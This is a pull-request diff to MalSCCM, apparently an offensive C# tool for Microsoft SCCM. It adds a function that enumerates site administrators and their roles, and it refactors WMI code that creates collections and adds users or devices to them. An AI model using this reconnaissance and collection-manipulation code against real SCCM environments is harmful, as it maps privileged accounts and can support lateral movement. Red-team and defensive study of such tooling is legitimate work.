@@ -131,7 +133,7 @@ public static class Enum
         try
         {
             var Query = new SelectQuery("SMS_ADForest");
-            var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             SCCMNamespace.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
 
@@ -160,7 +162,7 @@ public static class Enum
         try
         {
             var Query = new SelectQuery("SMS_Application");
-            var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             SCCMNamespace.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
 
@@ -189,7 +191,7 @@ public static class Enum
         try
         {
             var Query = new SelectQuery("SMS_Package");
-            var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             SCCMNamespace.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
 
@@ -218,7 +220,7 @@ public static class Enum
         try
         {
             var Query = new SelectQuery("SMS_Collection");
-            var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             SCCMNamespace.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
 
@@ -252,7 +254,7 @@ public static class Enum
         try
         {
             var Query = new SelectQuery("SMS_UserMachineRelationship");
-            var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             SCCMNamespace.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
 
@@ -286,7 +288,7 @@ public static class Enum
         try
         {
             var Query = new SelectQuery("SMS_ApplicationAssignment");
-            var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
+            var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
             SCCMNamespace.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
 
@@ -335,6 +337,43 @@ public static class Enum
         catch (Exception e)
         {
             Console.WriteLine("\r\nFunction error - FbGetSCCMPrimaryServerRegKey.");
+            var stdErr = Console.Error;
+            stdErr.WriteLine($"Error Message: {e.Message}");
+            return false;
+        }
+    }
+    
+    public static bool FbGetSCCMAdmins()
+    {
+        try
+        {
+            var query = new SelectQuery("SMS_Admin");
+            var scope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}");
+            scope.Connect();
+
+            var searcher = new ManagementObjectSearcher(scope, query);
+
+            foreach (var result in searcher.Get())
+            {
+                var logonName = result.GetPropertyValue("LogonName").ToString();
+                var adminSid = result.GetPropertyValue("AdminSid").ToString();
+                var roleNames = result.GetPropertyValue("RoleNames") as string[] ?? Array.Empty<string>();
+                var categoryNames = result.GetPropertyValue("CategoryNames") as string[] ?? Array.Empty<string>();
+                var collectionNames = result.GetPropertyValue("CollectionNames") as string[] ?? Array.Empty<string>();
+
+                Console.WriteLine("UserName: {0}", logonName);
+                Console.WriteLine("SID: {0}", adminSid);
+                Console.WriteLine("Roles: {0}", string.Join(", ", roleNames));
+                Console.WriteLine("Security Scopes: {0}", string.Join(", ", categoryNames));
+                Console.WriteLine("Collections: {0}", string.Join(", ", collectionNames));
+                Console.WriteLine();
+            }
+
+            return true;
+        }
+        catch (Exception e)
+        {
+            Console.WriteLine("\r\nFunction error - FbGetSCCMComputer.");
             var stdErr = Console.Error;
             stdErr.WriteLine($"Error Message: {e.Message}");
             return false;

--- a/MalSCCM/lib/Groups.cs
+++ b/MalSCCM/lib/Groups.cs
@@ -1,8 +1,9 @@
 ﻿using System;
 using System.Management;
+
 using MalSCCM.Commands;
 
-public class Groups
+public static class Groups
 {
     public static bool FbGetSCCMCollectionID()
     {
@@ -47,12 +48,13 @@ public class Groups
             return false;
         }
     }
+    
     public static bool FbNewSCCMCollection()
     {
         try
         {
-            ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection");
-            ManagementObject newInstance = Class.CreateInstance();
+            var Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection");
+            var newInstance = Class.CreateInstance();
 
             newInstance["Name"] = Group.GroupName;
             newInstance["OwnedByThisSite"] = "True";
@@ -84,15 +86,16 @@ public class Groups
             return false;
         }
     }
+    
     public static bool FbRemoveSCCMCollection()
     {
         try
         {
-            ManagementObject objHostSetting = new ManagementObject();
+            var objHostSetting = new ManagementObject();
             objHostSetting.Scope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode);
 
             //define lookup query  
-            string strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'";
+            var strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'";
             objHostSetting.Path = new ManagementPath(strQuery);
 
             //delete the Managementobject  
@@ -109,6 +112,7 @@ public class Groups
             return false;
         }
     }
+    
     public static bool FbGetUserResourceID()
     {
         try
@@ -139,24 +143,25 @@ public class Groups
             return false;
         }
     }
+    
     public static bool FbAddUserToSCCMCollection()
     {
         try
         {
-            ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
-            ManagementObject collQueryInstance = collQuery.CreateInstance();
+            var collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
+            var collQueryInstance = collQuery.CreateInstance();
 
             collQueryInstance["QueryExpression"] = "Select * from SMS_R_User Where UniqueUserName='" + Group.UserName + "'";
             collQueryInstance["RuleName"] = "Members of collection";
 
-            ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
-            ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule");
+            var collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
+            var inParams = collInstance.GetMethodParameters("AddMembershipRule");
 
             Console.WriteLine("Commiting instance");
 
             inParams.SetPropertyValue("collectionRule", collQueryInstance);
 
-            ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null);
+            var outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null);
 
             return true;
         }
@@ -168,6 +173,7 @@ public class Groups
             return false;
         }
     }
+    
     // To Do
     public static bool FbRemoveUserFromSCCMCollection()
     {
@@ -184,24 +190,25 @@ public class Groups
             return false;
         }
     }
+    
     public static bool FbAddDeviceToSCCMCollection()
     {
         try
         {
-            ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
-            ManagementObject collQueryInstance = collQuery.CreateInstance();
+            var collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
+            var collQueryInstance = collQuery.CreateInstance();
 
             collQueryInstance["QueryExpression"] = "Select * from SMS_R_System Where Name='" + Group.DeviceName + "'";
             collQueryInstance["RuleName"] = "Members of collection";
 
-            ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
-            ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule");
+            var collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
+            var inParams = collInstance.GetMethodParameters("AddMembershipRule");
 
             Console.WriteLine("Commiting instance");
 
             inParams.SetPropertyValue("collectionRule", collQueryInstance);
 
-            ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null);
+            var outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null);
 
             return true;
         }
@@ -213,6 +220,7 @@ public class Groups
             return false;
         }
     }
+    
     // To Do
     public static bool FbRemoveDeviceFromSCCMCollection()
     {

--- a/MalSCCM/lib/Groups.cs
+++ b/MalSCCM/lib/Groups.cs
@@ -10,7 +10,7 @@ public static class Groups
         try
         {
             var Query = new SelectQuery("SMS_Collection");
-            var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode);
+            var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode);
             SCCMNamespace.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
 
@@ -53,7 +53,7 @@ public static class Groups
     {
         try
         {
-            var Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection");
+            var Class = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection");
             var newInstance = Class.CreateInstance();
 
             newInstance["Name"] = Group.GroupName;
@@ -92,7 +92,7 @@ public static class Groups
         try
         {
             var objHostSetting = new ManagementObject();
-            objHostSetting.Scope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode);
+            objHostSetting.Scope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode);
 
             //define lookup query  
             var strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'";
@@ -118,7 +118,7 @@ public static class Groups
         try
         {
             var Query = new SelectQuery("SMS_R_User");
-            var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode);
+            var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode);
             SCCMNamespace.Connect();
             var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query);
 
@@ -148,13 +148,13 @@ public static class Groups
     {
         try
         {
-            var collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
+            var collQuery = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
             var collQueryInstance = collQuery.CreateInstance();
 
             collQueryInstance["QueryExpression"] = "Select * from SMS_R_User Where UniqueUserName='" + Group.UserName + "'";
             collQueryInstance["RuleName"] = "Members of collection";
 
-            var collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
+            var collInstance = new ManagementObject($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
             var inParams = collInstance.GetMethodParameters("AddMembershipRule");
 
             Console.WriteLine("Commiting instance");
@@ -195,13 +195,13 @@ public static class Groups
     {
         try
         {
-            var collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
+            var collQuery = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null);
             var collQueryInstance = collQuery.CreateInstance();
 
             collQueryInstance["QueryExpression"] = "Select * from SMS_R_System Where Name='" + Group.DeviceName + "'";
             collQueryInstance["RuleName"] = "Members of collection";
 
-            var collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
+            var collInstance = new ManagementObject($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'");
             var inParams = collInstance.GetMethodParameters("AddMembershipRule");
 
             Console.WriteLine("Commiting instance");


### PR DESCRIPTION
The main purpose of this PR was to add `FbGetSCCMAdmins` which reads the site administrative users from `SMS_Admin`.  Example output:

```
[*] Action: Get SCCM Admins
UserName: SCM-1\Administrator
SID: S-1-5-21-303941143-420902481-3534137921-500
Roles: Full Administrator
Security Scopes: All
Collections: All Systems, All Users and User Groups

UserName: LAB\rasta
SID: S-1-5-21-2629820871-389766067-3233314696-1106
Roles: Asset Manager, Application Administrator, Security Administrator
Security Scopes: test-scope
Collections: All Users and User Groups, All Desktop and Server Clients

[*] Inspect complete
```

It also includes some other refactoring and code clean-ups (mostly to satisfy my own OCD, for which I apologise).  The main functional change is to add `CommandName` as a get-only property on `ICommand`.  This way, it is enforced on the command classes, rather than leaving it to the dev to remember.  The `CommandCollection` class now also uses reflection to instantiate each command class, rather than having to manually add each to a dictionary.